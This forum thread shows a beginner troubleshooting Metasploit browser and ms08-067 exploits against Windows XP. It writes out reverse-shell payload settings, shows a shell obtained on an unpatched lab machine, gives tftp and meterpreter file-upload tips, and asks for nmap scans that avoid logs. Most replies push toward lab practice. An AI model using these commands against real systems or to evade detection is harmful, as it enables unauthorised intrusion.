problem with use MSF

Viewing 21 reply threads
  • Author
    Posts
    • #3010
      mr.Z
      Participant

      I have some problem with use metasploit

      i’m test more exploit but not sucss I’don’t wht problem

      look this example

      use windows/browser/ani_loadimage_chunksize

      set SRVHOST myip

      set SRVPORT 8000

      set URIPATH nono

      set payload windows/shell_reverse_tcp

      set LHOST ip victim

      >exploit

      [*] Started reverse handler[*] Using URL: http://ip:8000/nono%5B*%5D Server started.

      after i’m test this on OS xp sp and IE 7 ,IE 6

      after tell me [*] Sending HTML page to ip:6668…[*] Sending ANI file to ip:6668…

      i’m wating but nothing happen

      >> sessions -l

      Active sessions===============No active sessions.

      what problem >>>???

      any idea?

      and can any one give me some exploit working on xp sp2 and sp3

    • #20579
      BillV
      Participant

      Sounds like it’s not vulnerable.

    • #20580
      mr.Z
      Participant

      thanx

      but i’m show target

      —  —- 
      0  (Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista

      and i’m test on 7 pc’s seam problem  ;D

    • #20581
      BillV
      Participant

      Just because those are listed as targets, doesn’t mean they’re vulnerable… just what the exploit can attack.

    • #20582
      mr.Z
      Participant

      ok thanx

      but can give me some name exploit working on win xp sp1,sp2,sp3,vista

      and I want exploit use without send the url to victim

      I’m using MSF under windows xp

    • #20583
      BillV
      Participant

      @mr.Z wrote:

      I’m using MSF under windows xp

      There’s your first problem. Run it under Linux.

      I can’t tell you what exploit to use, it depends on what your target is vulnerable to. As you’ve already figured out how to do, you can see which exploits will work against which targets.

    • #20584
      Anonymous
      Participant

      ms08-067 exploit

    • #20585
      mr.Z
      Participant

      @BillV wrote:

      @mr.Z wrote:

      I’m using MSF under windows xp

      There’s your first problem. Run it under Linux.

      I can’t tell you what exploit to use, it depends on what your target is vulnerable to. As you’ve already figured out how to do, you can see which exploits will work against which targets.

      thanx alot  now i’m work in linux and update msf

      —-
      ChrisG

      thanx

      I’m test this exploit but show me message problem

      [*] Started bind handler
      [-] Exploit failed: The connection timed out (ip-vicitm:4444).
      [*] Exploit completed, but no session was created.

      why this not work what  problem

      but no session was created????

      plz tell me

    • #20586
      apollo
      Participant

      You probably aren’t vulnerable to that either, or something was wrong.  Since you may not be vulnerable to much, you may want to check out DVL linux (damn vulnerable linux) and start messing around on there.  That might get you further in the process.  Or install windows xp without service packs or patches and then metasploit becomes a lot more interesting.

    • #20587
      mr.Z
      Participant

      @apollo wrote:

      You probably aren’t vulnerable to that either, or something was wrong.  Since you may not be vulnerable to much, you may want to check out DVL linux (damn vulnerable linux) and start messing around on there.  That might get you further in the process.  Or install windows xp without service packs or patches and then metasploit becomes a lot more interesting.

      You are correct but I want test on full patch windows xp
      and I’m try much and i’m show if port 445 open then you can use ms08-067 expoit and if the windows xp full patch

      any more Idea?

    • #20588
      BillV
      Participant

      @mr.Z wrote:

      any more Idea?

      Yes, I think you need to do more research and studying regarding exploits and how metasploit works.

      I suggest you start here.

      BillV

    • #20589
      apollo
      Participant

      I’ll be slightly more helpful, if you have NO idea what something is vulnerable to, you may want to try a vulnerability scanner like nessus.  There is another option for you to google which is db_autopwn.  If you search for that, and you use backtrack3 things will get easier for you.  If you use this approach for evil, you will get caught, it is EXTREMELY noisy and will have a low success rate.  If you do find a vulnerability, do a sessions -lv and it will show you what exploit you are vulnerable to.

    • #20590
      geekyone
      Participant

      @mr.Z wrote:

      You are correct but I want test on full patch windows xp
      and I’m try much and i’m show if port 445 open then you can use ms08-067 expoit and if the windows xp full patch

      any more Idea?

      Your biggest problem is trying to exploit a fully patched windows xp box with metasploit.  If you want to learn more about metasploit and practice pen testing techniques don’t attack a fully patched box in your lab. 

      Metasploit doesn’t have any zero day vulnerabilities included in it (currently) so you are never going to be able to successfully exploit a fully patched box with metasploit right now.  Now if you really want to exploit a fully patched xp box you should take Billv’s suggestion to heart because that is going to involve getting into zero day vulnerability research.  Which requires an in depth understanding of how exploits work.  If you want to get into that I recommend starting by reading Hacking: The Art of Exploitation, 2nd Edition

    • #20591
      mr.Z
      Participant

      THANK YOU ALL

      now i’m install windows xp witout servies pack

      and exploit this windows

      i’m use paylod
      >”windows/shell_reverse_tcp”
      >exploit
      >Microsoft Windows XP [Version 5.1.2600]
      (C) Copyright 1985-2001 Microsoft Corp.

      C:WINDOWSsystem32>

      but I cant upload some file i’m using this msf under linux

      test some command like this
      >copy /root/xx.txt c:

      but not succss the error msg
      >copy /root/xx.txt c:
      The syntax of the command is incorrect

    • #20592
      KrisTeason
      Participant

      If your getting files from a command prompt, you have to get familiar with the tftp command. Remember to start the TFTP Server on your Linux box, when requesting the files using  tftp they come from your /tmp directory. You might want to try the meterpreter/shell_reverse_tcp Payload and use the upload from there, it’s quicker. The meterpreter also has alot of other useful options as well.

    • #20593
      mr.Z
      Participant

      now ok i’m using tftp
      now i have laptop and scan using nmap
      nmap -PN -p 445,21,135,139 192.168.1.1
      say
      Interesting ports on 192.168.1.1:
      PORT    STATE    SERVICE
      445/tcp filtered microsoft-ds
      135/tcp filtered
      …..
      what can I do for this problem I want exploit this my os win

    • #20594
      Anonymous
      Participant

      you’ll have to do a udp scan to see your open udp port 🙂

    • #20595
      mr.Z
      Participant

      OK THANK YOU FOR MORE INFO

      BUT I WANNA ASK YOU ABOUT TOOL NMAP IF I USING SCAN? IS SAFE I MEAN IF I SCAN SOME IP REG THIS ON SERVER REGISTER MY IP ON LOG SERVER OR WHAT ?

      IF YOU HAVE PAR MITER  COMMAND FOR NMAP DON’T REGISTER ON LOG GIVE ME PLZ

      like this

      nmap -sS hostname

      if i scan this SAFE or what?

    • #20596
      Anonymous
      Participant

      Using nmap is not safe, most scan will send packets to the target IP address. What the remote system does with these packets is up to them but logging, port scan detection and other techniques may be used to identify the scan.

      Jimbob

    • #20597
      mr.Z
      Participant

      but somebody say if using this command is safe?

      nmap -sS -O -v hostname

      ok can tell me what solution

    • #20598
      RoleReversal
      Participant

      @mr.Z wrote:

      but somebody say if using this command is safe?

      nmap -sS -O -v hostname

      ok can tell me what solution

      I’m a bit confused, what do you mean by ‘safe’?

      • liable to crash the target?
      • liable to get you arrested?
      • liable to start world war 3?

      All (well ok most) depend on your hardware, target and situation.

    • #20599
      KrisTeason
      Participant

      I think he’s trying to figure out what scan would be the noisiest and what scan would be safer to run without being logged. You should look into:
      http://www.nmap-tutorial.com/
      And download the Nmap Tutorial, PDF, I just gave it a quick read through it tells what parameters you could set in nmap to make it less detectable on hosts.

Viewing 21 reply threads
  • You must be logged in to reply to this topic.

Copyright ©2021 Caendra, Inc.

Contact Us

Thoughts, suggestions, issues? Send us an email, and we'll get back to you.

Sending

Sign in with Caendra

Forgot password?Sign up

Forgot your details?